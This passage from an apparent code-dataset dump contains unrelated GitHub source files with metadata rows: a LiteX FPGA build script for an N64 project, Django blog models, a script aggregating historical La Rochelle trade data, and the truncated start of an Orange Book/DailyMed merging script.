# self.comb += self.cd_sys.clk.eq(clk25)
#else:
if True:
# PLL
self.submodules.pll = pll = iCE40PLL(primitive="SB_PLL40_PAD")
pll.register_clkin(clk25, 25e6)
pll.create_clkout(self.cd_sys, sys_clk_freq)
#pll.create_clkout_90(self.cd_sys_ps, sys_clk_freq)
platform.add_period_constraint(self.cd_sys.clk, sys_clk_freq)
#platform.add_period_constraint(self.cd_sys_ps.clk, sys_clk_freq)
self.specials += DDROutput(0, 1, platform.request("sdram_clock"), self.cd_sys.clk)
# Power On Reset
por_cycles = 4096
por_counter = Signal(log2_int(por_cycles), reset=por_cycles-1)
self.comb += self.cd_por.clk.eq(self.cd_sys.clk)
platform.add_period_constraint(self.cd_por.clk, 1e9/sys_clk_freq)
self.sync.por += If(por_counter != 0, por_counter.eq(por_counter - 1))
#self.specials += AsyncResetSynchronizer(self.cd_por, ~rst_n)
self.specials += AsyncResetSynchronizer(self.cd_sys, (por_counter != 0) | ~pll.locked)
# n64 ----------------------------------------------------------------------------------------
kB = 1024
mB = 1024*kB
bios_flash_offset = 0x40000
from sim import get_sdram_phy_settings
class N64SoC(SoCCore):
mem_map = {**SoCCore.mem_map, **{
"spiflash": 0x20000000, # (default shadow @0xa0000000)
}}
def __init__(self, simulate, sdram_init=[], with_analyzer=False):
self.simulate = simulate
if simulate:
platform = litex_platform_n64.N64SimPlatform()
else:
platform = litex_platform_n64.Platform()
sys_clk_freq = int(48e6)
kwargs = {}
kwargs["clk_freq"] = sys_clk_freq
kwargs["cpu_type"] = "vexriscv"
kwargs["cpu_variant"] = "minimal"
kwargs["integrated_rom_size"] = 0
kwargs["integrated_sram_size"] = 2*kB
kwargs["cpu_reset_address"] = self.mem_map["spiflash"] + bios_flash_offset
if simulate:
kwargs["with_uart"] = False
kwargs["with_ethernet"] = False
# SoCMini ----------------------------------------------------------------------------------
SoCCore.__init__(self, platform, **kwargs)
if simulate:
self.submodules.uart_phy = uart.RS232PHYModel(platform.request("serial"))
self.submodules.uart = uart.UART(self.uart_phy)
self.add_csr("uart")
self.add_interrupt("uart")
if not self.integrated_main_ram_size:
if simulate:
sdram_data_width = 16
sdram_module = IS42S16320(sys_clk_freq, "1:1")
phy_settings = get_sdram_phy_settings(
memtype = sdram_module.memtype,
data_width = sdram_data_width,
clk_freq = sys_clk_freq)
self.submodules.sdrphy = SDRAMPHYModel(sdram_module, phy_settings, init=sdram_init)
self.add_constant("MEMTEST_DATA_SIZE", 8*1024)
self.add_constant("MEMTEST_ADDR_SIZE", 8*1024)
else:
self.submodules.sdrphy = GENSDRPHY(platform.request("sdram"))
self.add_sdram("sdram",
phy = self.sdrphy,
module = IS42S16320(sys_clk_freq, "1:1"),
origin = self.mem_map["main_ram"],
size = kwargs.get("max_sdram_size", 0x4000000),
l2_cache_size = kwargs.get("l2_size", 8192),
l2_cache_min_data_width = kwargs.get("min_l2_data_width", 128),
l2_cache_reverse = True
)
# CRG --------------------------------------------------------------------------------------
if simulate:
self.submodules.crg = CRG(platform.request("sys_clk"))
else:
self.submodules.crg = _CRG(platform, sys_clk_freq)
if simulate:
integrated_rom_init = get_mem_data("build/software/bios/bios.bin", "little")
self.add_rom("rom", self.cpu.reset_address, len(integrated_rom_init)*4, integrated_rom_init)
else:
self.submodules.spiflash = SpiFlash(platform.request("spiflash"), dummy=8, endianness="little")
self.register_mem("spiflash", self.mem_map["spiflash"], self.spiflash.bus, size=8*mB)
self.add_csr("spiflash")
self.add_memory_region("rom", self.mem_map["spiflash"] + bios_flash_offset, 32*kB, type="cached+linker")
# Led --------------------------------------------------------------------------------------
self.submodules.led = GPIOOut(platform.request("io0"))
self.add_csr("led")
# GPIOs ------------------------------------------------------------------------------------
self.submodules.gpio0 = GPIOOut(platform.request("io1"))
self.add_csr("gpio0")
self.submodules.gpio1 = GPIOOut(platform.request("io2"))
self.add_csr("gpio1")
platform.add_extension(_gpios)
if with_analyzer:
analyzer_signals = [
self.cpu.ibus,
self.cpu.dbus
]
self.submodules.analyzer = LiteScopeAnalyzer(analyzer_signals, 512)
self.add_csr("analyzer")
# Load / Flash -------------------------------------------------------------------------------------
# Build --------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="do the thing")
#parser.add_argument("--load", action="store_true", help="load bitstream")
parser.add_argument("--flash", action="store_true", help="flash bitstream")
parser.add_argument("--sim", action="store_true", help="simulate")
parser.add_argument("--threads", default=1, help="simulate")
parser.add_argument("--trace", action="store_true", help="Enable VCD tracing")
parser.add_argument("--trace-start", default=0, help="Cycle to start VCD tracing")
parser.add_argument("--trace-end", default=-1, help="Cycle to end VCD tracing")
parser.add_argument("--opt-level", default="O3", help="Compilation optimization level")
parser.add_argument("--sdram-init", default=None, help="SDRAM init file")
args = parser.parse_args()
sim_config = SimConfig(default_clk="sys_clk")
sim_config.add_module("serial2console", "serial")
build_kwargs = {}
if args.sim:
build_kwargs["threads"] = args.threads
build_kwargs["sim_config"] = sim_config
build_kwargs["opt_level"] = args.opt_level
build_kwargs["trace"] = args.trace
build_kwargs["trace_start"] = int(args.trace_start)
build_kwargs["trace_end"] = int(args.trace_end)
soc = N64SoC(
simulate=args.sim,
sdram_init = [] if args.sdram_init is None else get_mem_data(args.sdram_init, "little"),
)
builder = Builder(soc, output_dir="build", csr_csv="scripts/csr.csv")
builder.build(run=not (args.sim or args.flash), **build_kwargs)
if args.flash:
from litex.build.lattice.programmer import IceStormProgrammer
prog = IceStormProgrammer()
#prog.flash(4194304, "sm64_swapped_half.n64")
prog.flash(bios_flash_offset, "build/software/bios/bios.bin")
prog.flash(0x00000000, "build/gateware/litex_platform_n64.bin")
if args.sim:
builder.build(build=False, **build_kwargs)
if __name__ == "__main__":
main()
| Stary2001/n64 | gateware/litex/litex_soc.py | litex_soc.py | py | 9,352 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "litex.build.io.DDROutput",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "migen.genlib.resetsync.AsyncResetSynchronizer",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "litex_platform_n64.N64SimPlatform",
"line_number": 96,
"usage_type... |
30635528648 | from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class Group(models.Model):
""" модель группы """
title = models.CharField(
max_length=200,
verbose_name="Заголовок",
)
slug = models.SlugField(
unique=True,
)
description = models.TextField(
verbose_name="Описание",
)
class Meta:
verbose_name_plural = "Группы"
verbose_name = "Группа"
def __str__(self):
return self.title
class Post(models.Model):
""" модель публикации """
text = models.TextField(
verbose_name="Текст",
)
pub_date = models.DateTimeField(
auto_now_add=True,
verbose_name="Дата публикации",
)
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name="posts",
verbose_name="Автор",
)
group = models.ForeignKey(
Group,
on_delete=models.SET_NULL,
related_name="posts",
verbose_name="Группа",
blank=True,
null=True,
)
image = models.ImageField(
upload_to="posts/", blank=True, null=True, verbose_name="Изображение"
)
class Meta:
verbose_name_plural = "Посты"
verbose_name = "Пост"
ordering = ["-pub_date"]
def __str__(self):
return (
f"Пользователь: {self.author.username}, "
f"Группа: {self.group}, "
f'Дата и время: {self.pub_date.strftime("%d.%m.%Y %H:%M:%S")}, '
f"Текст: {self.text[:15]}, "
f"Картинка: {self.image}"
)
class Comment(models.Model):
""" модель комментрия """
post = models.ForeignKey(
Post,
on_delete=models.CASCADE,
related_name="comments",
verbose_name="Пост",
)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name="comments", verbose_name="Автор"
)
text = models.TextField(
verbose_name="Текст",
)
created = models.DateTimeField(
auto_now_add=True, verbose_name="Дата и время публикации"
)
class Meta:
verbose_name_plural = "Комментарии"
verbose_name = "Комментарий"
ordering = ["-created"]
def __str__(self):
return (
f"Пост: {self.post}, "
f"Автор: {self.author}, "
f"Текст: {self.text[:15]}, "
f'Дата: {self.created}.strftime("%d.%m.%Y %H:%M:%S")'
)
class Follow(models.Model):
""" модель подписки """
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name="follower",
verbose_name="Пользователь",
)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name="following", verbose_name="Автор"
)
class Meta:
verbose_name = "Система подписки"
def __str__(self):
return f"Автор: {self.author}, Пользователь: {self.user}"
| YaRomanovIvan/yatube | posts/models.py | models.py | py | 3,270 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.get_user_model",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.db.models.Model",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 8,
"usage_type": "name"
},
{
"api_... |
23084020676 | import csv
from operator import itemgetter
from lib import get_online_csv, write_csv, logger, write_readme
products_names_translations = {
"Café": "Coffee",
"Cordonnerie et sellerie": "Shoemaking and upholstery",
"Cuirs, peaux et pelleterie": "Hides, skins and furs",
"Eaux-de-vie et liqueurs": "Brandies and liqueurs",
"Farine, gruau, biscuits et pâtes": "Flour, oatmeal, cookies and pasta",
"Indigo": "Indigo",
"Mercerie": "Haberdashery",
"Objets d'art et d'histoire naturelle": "Works of art and natural history",
"Ouvrages métalliques": "Metallic works",
"Quincaillerie": "Hardware store",
"Sel": "Salt",
"Sucre": "Sugar",
"Toiles de chanvre et de lin": "Hemp and linen fabrics",
"Toiles de coton": "Cotton fabrics",
"Vins de Bordeaux": "Bordeaux wines",
"Vins divers": "Diverse wines",
"Étoffes de laine": "Woolen fabrics",
"Étoffes de soie": "Silk fabrics",
"Toiles diverses" : "Various clothes"
}
"""
Produits dont les valeurs d'exports sont les plus importantes en 1789 : comparaison de La Rochelle à la moyenne française
"""
def compute_top_shared_toflit18_products(flows):
logger.info('start | compute_top_shared_toflit18_products')
total_exports_per_direction = {}
total_imports_per_direction = {}
# calcul de la part de chaque produit dans les exports totaux
total_exports_la_rochelle_1789 = 0
total_exports_toute_france_1789 = 0
total_exports_la_rochelle_1789_without_ports_francs = 0
total_exports_toute_france_1789_without_ports_francs = 0
# normalizes toflit flow to have it as La Rochelle or France
def prepare_flow(flow):
f = flow.copy()
if f['export_import'] == 'Imports' or f['export_import'] == 'import':
f['export_import'] = 'Imports'
elif f['customs_region'] == '' or f['customs_region'] == 'National':
f['customs_region_simpl'] = 'National'
if f['customs_region'] == 'La Rochelle':
f['customs_region_simpl'] = 'La Rochelle'
else:
f['customs_region_simpl'] = 'Autre direction'
f['value'] = float(f['value']) if f['value'] != '' else 0
return f
def clean_flow(flow):
f = flow.copy()
abs_map = total_exports_per_direction if f['export_import'] == 'Exports' else total_imports_per_direction
f['value_rel_per_direction'] = f['value'] / \
abs_map[f['customs_region_simpl']]
return f
def aggregate_exports_by_product(flows):
flows_aggregated_by_product = {}
# je veux construire un dict par produit, en distinguant LR / pas LR
for flow in flows:
if flow['product_revolutionempire'] not in flows_aggregated_by_product:
flows_aggregated_by_product[flow['product_revolutionempire']] = {
'product': flow['product_revolutionempire'],
'exports_la_rochelle': 0,
'exports_toute_france': 0,
}
# à la fin pour chaque produit je sommerais le total export pour calculer du relatif
if flow['customs_region_simpl'] == 'La Rochelle' and flow['export_import'] == 'Exports':
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_la_rochelle'] += float(flow['value'])
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_toute_france'] += float(flow['value'])
return flows_aggregated_by_product
def aggregate_exports_by_product_removing_ports_francs(flows):
flows_aggregated_by_product = {}
# je veux construire un dict par produit, en distinguant LR / pas LR
for flow in flows:
if flow['product_revolutionempire'] not in flows_aggregated_by_product:
flows_aggregated_by_product[flow['product_revolutionempire']] = {
'product': flow['product_revolutionempire'],
'exports_la_rochelle': 0,
'exports_toute_france': 0,
}
# à la fin pour chaque produit je sommerais le total export pour calculer du relatif
if flow['partner_grouping'] != 'France' and flow['export_import'] == 'Exports':
if flow['customs_region_simpl'] == 'La Rochelle':
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_la_rochelle'] += float(flow['value'])
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_toute_france'] += float(flow['value'])
return flows_aggregated_by_product
for f in flows:
flow = prepare_flow(f)
if flow['export_import'] == 'Imports':
if flow['customs_region_simpl'] not in total_imports_per_direction:
total_imports_per_direction[flow['customs_region_simpl']] = 0
total_imports_per_direction[flow['customs_region_simpl']
] += float(flow['value'])
else:
if flow['customs_region_simpl'] not in total_exports_per_direction:
total_exports_per_direction[flow['customs_region_simpl']] = 0
total_exports_per_direction[flow['customs_region_simpl']
] += float(flow['value'])
flows = [clean_flow(prepare_flow(f)) for f in flows]
# aggregation des flux par produit
product_exports_values_per_direction_1789 = aggregate_exports_by_product(
flows)
product_exports_values_per_direction_1789_without_ports_francs = aggregate_exports_by_product_removing_ports_francs(
flows)
for product, values in product_exports_values_per_direction_1789.items():
total_exports_la_rochelle_1789 += values['exports_la_rochelle']
total_exports_toute_france_1789 += values['exports_toute_france']
for product, values in product_exports_values_per_direction_1789.items():
values['exports_rel_la_rochelle'] = values['exports_la_rochelle'] / \
total_exports_la_rochelle_1789
values['exports_rel_toute_france'] = values['exports_toute_france'] / \
total_exports_toute_france_1789
for product, values in product_exports_values_per_direction_1789_without_ports_francs.items():
total_exports_la_rochelle_1789_without_ports_francs += values['exports_la_rochelle']
total_exports_toute_france_1789_without_ports_francs += values['exports_toute_france']
for product, values in product_exports_values_per_direction_1789_without_ports_francs.items():
values['exports_rel_la_rochelle'] = values['exports_la_rochelle'] / \
total_exports_la_rochelle_1789_without_ports_francs
values['exports_rel_toute_france'] = values['exports_toute_france'] / \
total_exports_toute_france_1789_without_ports_francs
# ordonner en mettant en premier les produits les plus importants pour La Rochelle
sorted_product_exports_values_per_direction_1789 = sorted(
product_exports_values_per_direction_1789.values(), key=itemgetter('exports_rel_la_rochelle'), reverse=True)
sorted_product_exports_values_per_direction_1789_without_ports_francs = sorted(
product_exports_values_per_direction_1789_without_ports_francs.values(), key=itemgetter('exports_rel_la_rochelle'), reverse=True)
# reformatter les données sous la forme d'un ensemble de dicts : un dict par produit pour La Rochelle et un dict par produit pour l'ensemble de la France
final_vega_data_1789 = []
i = 0
for values in sorted_product_exports_values_per_direction_1789:
final_vega_data_1789.append({
"product": values['product'],
"entity": 'direction des fermes de La Rochelle',
"value_rel_per_direction": values['exports_rel_la_rochelle'],
"order": i
})
final_vega_data_1789.append({
"product": values['product'],
"entity": "France (moyenne)",
"value_rel_per_direction": values['exports_rel_toute_france'],
"order": i
})
i += 1
final_vega_data_1789_without_ports_francs = []
i = 0
for values in sorted_product_exports_values_per_direction_1789_without_ports_francs:
final_vega_data_1789_without_ports_francs.append({
"product": values['product'],
"product_fr": values['product'],
"product_en": products_names_translations[values['product']] if values["product"] in products_names_translations else values['product'],
"entity": 'direction des fermes de La Rochelle',
"entity_fr": 'direction des fermes de La Rochelle',
"entity_en": 'direction des fermes of La Rochelle',
"value_rel_per_direction": values['exports_rel_la_rochelle'],
"order": i
})
final_vega_data_1789_without_ports_francs.append({
"product": values['product'],
"product_fr": values['product'],
"product_en": products_names_translations[values['product']] if values["product"] in products_names_translations else values['product'],
"entity": "France (moyenne)",
"entity_fr": "France (moyenne)",
"entity_en": "France (mean)",
"value_rel_per_direction": values['exports_rel_toute_france'],
"order": i
})
i += 1
info = """
`comparison_products_exports_part_la_rochelle.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One product exported by either France or La Rochelle customs direction.
# Filters
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
# Aggregation/computation info
- flows geographic attribution is done according to 3 classes : La Rochelle (customs_direction = "La Rochelle"), National (customs_direection = "National" or "") and "Autre direction"
- France means metrics per products are derivated from all flows, La Rochelle comes from La Rochelle flows only
- products classes are from "revolution & empire" classification
- values aggregated by cumulated value in livre tournois
# Notes/warning
One should wonder if using both national and direction-level for France means might cause duplicates (?).
However it might not matter so much as we are calculating a means of products shares (?).
"""
write_readme("comparison_products_exports_part_la_rochelle/README.md", info)
write_csv("comparison_products_exports_part_la_rochelle/comparison_products_exports_part_la_rochelle.csv", final_vega_data_1789_without_ports_francs)
logger.debug('done | compute_top_shared_toflit18_products')
def compute_global_la_rochelle_evolution (flows_national, flows_regional):
logger.info('start | compute_global_la_rochelle_evolution')
years_list = [y + 1720 for y in range(1789 - 1720 + 1)]
flows_national = [f for f in flows_national if int(f["year"].split('.')[0]) >= 1720 and int(f["year"].split('.')[0]) <= 1789]
flows_regional = [f for f in flows_regional if int(f["year"].split('.')[0]) >= 1720 and int(f["year"].split('.')[0]) <= 1789]
years = {}
for y in years_list:
years[y] = {
"year": y,
"france_total": 0,
"france_export": 0,
"france_import": 0,
"la_rochelle_total": 0,
"la_rochelle_export": 0,
"la_rochelle_import": 0,
}
for f in flows_national:
year = int(str(f['year'].split('.')[0]))
value = float(f['value']) if f['value'] != '' else 0
itype = f['export_import'] if f['export_import'] != 'import' else 'Imports'
detailed_field = 'france_import' if itype == 'Imports' else 'france_export'
years[year]['france_total'] = years[year]['france_total'] + value
years[year][detailed_field] = years[year][detailed_field] + value
for f in flows_regional:
year = int(str(f['year'].split('.')[0]))
value = float(f['value']) if f['value'] != '' else 0
itype = f['export_import'] if f['export_import'] != 'import' else 'Imports'
from_larochelle = f['customs_region'] == 'La Rochelle'
if from_larochelle:
detailed_field = 'la_rochelle_import' if itype == 'Imports' else 'la_rochelle_export'
years[year]['la_rochelle_total'] += value
years[year][detailed_field] += value
part_by_year = []
for year, values in years.items():
part_by_year.append({
"year": year,
"type": "import",
"portion": values['la_rochelle_import'] / values['france_total'] if values['france_total'] > 0 else 0
})
part_by_year.append({
"year": year,
"type": "export",
"portion": values['la_rochelle_export'] / values['france_total'] if values['france_total'] > 0 else 0
})
info = """
`global_evolution_la_rochelle_imports_exports.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One year of import or export for La Rochelle, with attached metrics about share of trade against france total trade.
# Filters
- for La Rochelle numbers : source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- for national numbers : source "best guess national partner" (best_guess_national_partner == 1)
- we exclude ports francs ("product_grouping" != "France")
# Aggregation/computation info
- values aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("global_evolution_la_rochelle_imports_exports/README.md", info)
write_csv("global_evolution_la_rochelle_imports_exports/global_evolution_la_rochelle_imports_exports.csv", part_by_year)
logger.debug('done | compute_global_la_rochelle_evolution')
def compute_exports_colonial_products(flows):
logger.info('start | compute_exports_colonial_products')
output = []
origins = set()
pasa_provinces = ['Aunis', 'Poitou', 'Saintonge', 'Angoumois']
# Starting with sables d'Olonne as they are not in the data
customs_offices = {
"Les Sables d'Olonne": {
"autres produits": 0,
"produits coloniaux": 0,
"produits de la région PASA" : 0
}
}
for f in [f for f in flows if f["customs_region"] == "La Rochelle"] :
product_viz = ''
product_viz_alt = ''
product = f['product_revolutionempire']
customs_office = f['customs_office'] if f['customs_office'] != 'Aligre' else 'Marans';
if (customs_office not in customs_offices):
customs_offices[customs_office] = {
"autres produits": 0,
"produits coloniaux": 0,
"produits de la région PASA" : 0
}
value = str(f['value']).split('.')[0] if str(f['value']).split('.')[0] != '' else 0
flow_type = f['export_import']
local_origin = True if f['origin_province'] in pasa_provinces else False
if product in ['Café', 'Sucre', 'Indigo', 'Coton non transformé']:
product_viz = "produits coloniaux"
product_viz_alt = "produits coloniaux"
else:
product_viz = "autres produits"
if local_origin == True:
product_viz_alt = "produits de la région PASA"
else:
product_viz_alt = "autres produits"
if f["export_import"] == "Exports":
customs_offices[customs_office][product_viz_alt] += float(value)
english_translation = {
'produits de la région PASA': 'PASA region products',
'produits coloniaux': 'colonial products',
'autres produits': 'other products'
}
for customs_office, products in customs_offices.items():
for product, value in products.items():
output.append({
"value": value,
"customs_office": customs_office,
"type_fr": product,
"type_en": english_translation[product]
})
output = sorted(output, key=lambda v : -v["value"])
info = """
`comparaison_exports_coloniaux.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One class of product for one customs office (direction des fermes) with its value.
# Filters
- year = 1789
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
# Aggregation/computation info
- products are classed along three categories:
- "produit colonial" if product revolution&empire class is in ['Café', 'Sucre', 'Indigo', 'Coton non transformé']
- "produit de la région PASA" if "origin_province" is in ['Aunis', 'Poitou', 'Saintonge', 'Angoumois']
- "autre produit" for all the rest
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("comparaison_exports_coloniaux/README.md", info)
write_csv("comparaison_exports_coloniaux/comparaison_exports_coloniaux.csv", output)
logger.debug('done | compute_exports_colonial_products')
def compute_eau_de_vie_datasets(flows):
logger.info('start | compute_eau_de_vie_datasets')
eau_de_vie_types = get_online_csv("https://docs.google.com/spreadsheets/d/e/2PACX-1vQI3rLZXqFtiqO4q8Pbp5uGH8fon-hYrd-LnJGtsYMe6UWWCwubvanKZY4FW1jI6eJ5OJ_GA8xUxYQf/pub?output=csv")
eau_de_vie_types_map = {}
for item in eau_de_vie_types:
eau_de_vie_types_map[item['product_simplification']] = item['type_edv']
la_rochelle_exports_by_year = {}
export_slices = {
"1750": {
"La Rochelle": 0,
"Bordeaux": 0,
"Nantes": 0,
"Bayonne": 0,
"Montpellier": 0
},
"1770": {
"La Rochelle": 0,
"Bordeaux": 0,
"Nantes": 0,
"Bayonne": 0,
"Montpellier": 0
},
"1789": {
"La Rochelle": 0,
"Bordeaux": 0,
"Nantes": 0,
"Bayonne": 0,
"Montpellier": 0
}
}
origins = {}
for flow in flows:
value = float(flow['value']) if flow['value'] != '' else 0
year = flow['year']
customs_region = flow['customs_region']
origin = flow['origin'] if flow['origin'] != '' else 'inconnu'
if flow['export_import'] == 'Exports':
if year in export_slices:
if customs_region in export_slices[year]:
export_slices[year][customs_region] += value
if customs_region == 'La Rochelle':
if year not in la_rochelle_exports_by_year:
la_rochelle_exports_by_year[year] = value
else:
la_rochelle_exports_by_year[year] += value
if year == '1789':
if origin not in origins:
origins[origin] = {
"total": 0,
"EDV simple": 0,
"EDV double": 0
}
origins[origin]['total'] += value
origins[origin][eau_de_vie_types_map[flow['product_simplification']]] += value
origins_map = {}
for origin, types in origins.items():
for that_type, value in types.items():
resolved_type = 'eau-de-vie simple' if that_type == 'EDV simple' else 'eau-de-vie double'
if origin not in origins_map:
origins_map[origin] = {}
if resolved_type not in origins_map[origin]:
origins_map[origin][resolved_type] = 0
origins_map[origin][resolved_type] += float(value)
origins_list = []
for origin, types in origins_map.items():
for that_type, value in types.items():
origins_list.append({
"origin": origin,
"type": that_type,
"value": value
})
export_slices_array = []
for year, values in export_slices.items():
for region, local_value in values.items():
export_slices_array.append({
"year": year,
"customs_region": region,
"value": local_value
})
la_rochelle_exports_by_year = [{"year": year, "value": value} for year, value in la_rochelle_exports_by_year.items()]
info = """
`exports_eau_de_vie_la_rochelle_longitudinal.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One year of eau-de-vie exports from La Rochelle.
# Filters
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
- customs_direction = "La Rochelle"
- type = exports
- filtering eau-de-vie products : flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin"
# Aggregation/computation info
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("exports_eau_de_vie_la_rochelle_longitudinal/README.md", info)
write_csv("exports_eau_de_vie_la_rochelle_longitudinal/exports_eau_de_vie_la_rochelle_longitudinal.csv", la_rochelle_exports_by_year)
info = """
`exports_eau_de_vie_comparaison_directions_des_fermes.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One year of eau-de-vie exports for one specific customs direction (direction des fermes).
# Filters
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
- customs_direction = "La Rochelle" or "Bordeaux" or "Nantes" or "Bayonne" or "Montpellier"
- type = exports
- filtering eau-de-vie products : flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin"
# Aggregation/computation info
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("exports_eau_de_vie_comparaison_directions_des_fermes/README.md", info)
write_csv("exports_eau_de_vie_comparaison_directions_des_fermes/exports_eau_de_vie_comparaison_directions_des_fermes.csv", export_slices_array)
info = """
`origines_exports_eau_de_vie_1789_la_rochelle.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One type of eau-de-vie, for one type of origin.
# Filters
- year = 1789
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
- customs_direction = "La Rochelle" or "Bordeaux" or "Nantes" or "Bayonne" or "Montpellier"
- type = exports
- filtering eau-de-vie products : flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin"
# Aggregation/computation info
- eau-de-vie are classified as simple or double against [the following classification](https://docs.google.com/spreadsheets/d/e/2PACX-1vQI3rLZXqFtiqO4q8Pbp5uGH8fon-hYrd-LnJGtsYMe6UWWCwubvanKZY4FW1jI6eJ5OJ_GA8xUxYQf/pub?output=csv)
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("origines_exports_eau_de_vie_1789_la_rochelle/README.md", info)
write_csv("origines_exports_eau_de_vie_1789_la_rochelle/origines_exports_eau_de_vie_1789_la_rochelle.csv", origins_list)
logger.debug('done | compute_eau_de_vie_datasets')
with open('../data/toflit18_all_flows.csv', 'r') as f:
toflit18_flows = csv.DictReader(f)
# fill relevant flows
flows_1789_by_region = []
flows_1789_national = []
flows_national_all_years = []
flows_regional_all_years = []
flows_eau_de_vie = []
for flow in toflit18_flows:
# getting international exports of salt from La Rochelle
if flow['customs_region'] in ['La Rochelle', 'Bordeaux', 'Bayonne', 'Nantes', 'Montpellier'] and (flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin") and flow["best_guess_region_prodxpart"] == "1" and flow["partner_grouping"] != "France":
flows_eau_de_vie.append(flow)
# filtering out ports francs
if flow["year"] == "1789":
if flow["best_guess_region_prodxpart"] == "1" and flow["partner_grouping"] != "France":
flows_1789_by_region.append(flow)
if flow["best_guess_region_prodxpart"] == "1" and flow["partner_grouping"] != "France":
flows_regional_all_years.append(flow)
if flow["best_guess_national_partner"] == "1" and flow["partner_grouping"] != "France":
flows_national_all_years.append(flow)
compute_top_shared_toflit18_products(flows_1789_by_region)
compute_global_la_rochelle_evolution(flows_national_all_years, flows_regional_all_years)
compute_exports_colonial_products(flows_1789_by_region)
compute_eau_de_vie_datasets(flows_eau_de_vie) | medialab/portic-storymaps-2021 | datascripts/secondary_toflit18.py | secondary_toflit18.py | py | 25,597 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "lib.logger.info",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "lib.logger",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "operator.itemgetter",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "operator.itemgetter",... |
3458977723 | import pandas as pd
import numpy as np
from static.constants import FILE_PATH
def count_not_nan(row, columns):
return row[columns].count()
if __name__ == '__main__':
fda_app_num_df = pd.DataFrame(columns=['ID'])
full_info_df = pd.DataFrame(columns=['ID'])
# Orange Book
ob_raw_df = pd.read_csv(FILE_PATH.ORANGE_BOOK_ORIGIN, delimiter='~', dtype=str)
print('OrangeBook Initial: ' + str(len(ob_raw_df)))
ob_raw_df['Full_Appl_No'] = np.where(ob_raw_df.Appl_Type == 'N', 'NDA' + ob_raw_df.Appl_No, 'ANDA' + ob_raw_df.Appl_No)
ob_raw_df = ob_raw_df.sort_values(['Full_Appl_No'], ascending=True).reset_index(drop=True)
ob_unique_df = ob_raw_df.drop_duplicates(subset=['Full_Appl_No'], keep='first')
ob_unique_df = ob_unique_df[['Full_Appl_No']].copy()
ob_unique_df['ID'] = ob_unique_df['Full_Appl_No']
ob_unique_df = ob_unique_df.rename(columns={'Full_Appl_No': 'ob_FDA_Application_Number'})
print('OrangeBook Filtered: ' + str(len(ob_unique_df)))
full_info_df = ob_unique_df[['ID']].copy()
full_info_df = pd.merge(full_info_df, ob_unique_df, how='left', on='ID')
# DailyMed
dm_origin_df = pd.read_csv(FILE_PATH.DAILYMED_ORIGIN, delimiter='|')
print('DailyMed Initial: ' + str(len(dm_origin_df)))
dm_accessible_df = pd.read_csv(FILE_PATH.DAILYMED_RAW)
print('DailyMed Accessible: ' + str(len(dm_accessible_df)))
dm_remap_df = pd.read_csv(FILE_PATH.DAILYMED_REMAP)
print('DailyMed Remap: ' + str(len(dm_remap_df)))
